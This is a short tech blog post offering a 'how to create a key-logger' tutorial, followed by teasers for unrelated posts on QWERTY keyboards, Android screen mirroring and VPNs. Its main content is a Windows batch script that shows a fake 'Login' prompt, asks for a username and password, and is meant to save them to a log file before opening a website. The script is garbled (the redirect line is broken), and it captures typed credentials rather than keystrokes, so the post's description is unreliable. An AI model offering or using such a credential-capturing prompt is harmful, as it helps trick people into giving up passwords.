Skip to main content

How to Create a key-logger?

The key-logger is one of the oldest tools in the world of hacking, but despite this, it is still effective. Next ,i'm going to show you how to create key-logger in a simple way, using notepad.

What is Key-logger?

 A key-logger is a type of spyware that records all keystrokes on victims computer secretly. Key-logger are widely used by cyber-criminals to obtain information on bank accounts and credit cards, data such as usernames, passwords, and other personal information.


HOW TO MAKE A KEY-LOGGER?

 Here is a basic key-logger script for beginners to understand the basics of how key-logging works in notepad.

  • Open notepad on your Windows and paste the script given below.
@echo off 
color a
title Login
cls
echo Please Enter Your Email Address and Password
echo.
echo.
cd C:\Logs
set /p user= Username:
set /p pass=Password:
echo Username="%user%"
Password="%pass%"
Log.txt
start
http://TechiViewer.com/
exit


  • Now save the notepad file as logs.bat in the desktop

  • After that, create a new folder and name it "Logs" and move it to C drive.

  • It's time the file log.bat. Double click on the log.bat file which placed on your desktop and then enter username and password.

  • Now head over to C drive where you have placed the log folder.Open the folder and you will see a notepad key-logger which will display you the username and password.
With the help of the above steps , you can record all the various key-strokes of the keyboard which have been entered or used in batch file.This trick is just to tell you about how key-loggers work. 


Comments

Post a Comment

Popular posts from this blog

Why Do We Have QWERTY Keyboard, Not ABCDE?

Why Do We Have QWERTY Keyboard, Not ABCDE? In electronic devices, there are several types of keyboards among which stand out the standard PC type keyboards. Yes, we are talking about the ones we use when using a computer. Out of all others, QWERTY is the most popular and common. However, have you ever wondered what motivates the order of computer keyboard letters? For this arrangement, known as QWERTY. So, if you are looking for the answer why our computer keyboard letters arranged as QWERTY instead of ABCDE then here we are going to share a reasonable answer.   As we already mentioned, there are lots of keyboards made for computers that use different dimensions and arrangement of keys. However, QWERTY is the most common one.  It was designed around 1968 and has the peculiarity that its name (QWERTY) is the first six letters of its upper row of keys.   The reason dates back to the time where people used typewriters. When the typewriter was first invente...

Mirror your Android screen on your pc

Go to this link Go click this  MirrorGo Android Recorder - Mirror Android screen to PC. You will be displayed with a new page of " MIRRORGO ANDROID RECORDER " Scroll down you will see a box with download # Mirrorgo #. After your  exe file  is downloaded click it and install. Connect your android device to pc through a data cable or through  wifi  if your pc has wifi in it. Enable  USB debugging  in your mobile phone which is available in  developer option . Here you go you will be displayed your android screen on your pc.

WHAT IS A VPN IS ALL ABOUT?

What is a VPN? A VPN creates a secure, encrypted “tunnel” over the internet between your computer, smartphone or tablet and whatever website or app you are trying to access. This is made possible by redirecting your connection via a VPN server in another country, which makes it appear to a website or application that you are just another ‘local’ visitor. You become effectively anonymous as your IP address (the numerical label that identifies your device’s online connection) is replaced with that of the VPN server. All you need in order to do this is a VPN app on your device and an affordable subscription. The best VPNs work across laptops, desktops, smartphones and tablets – even a Smart TV, with the aid of an ethernet cable or a Chromecast dongle. When you want to mask your real location, simply launch the VPN app, select the country from which you want to connect then off you go! After that, simply use your browser and any apps as you would normally do. How do I conn...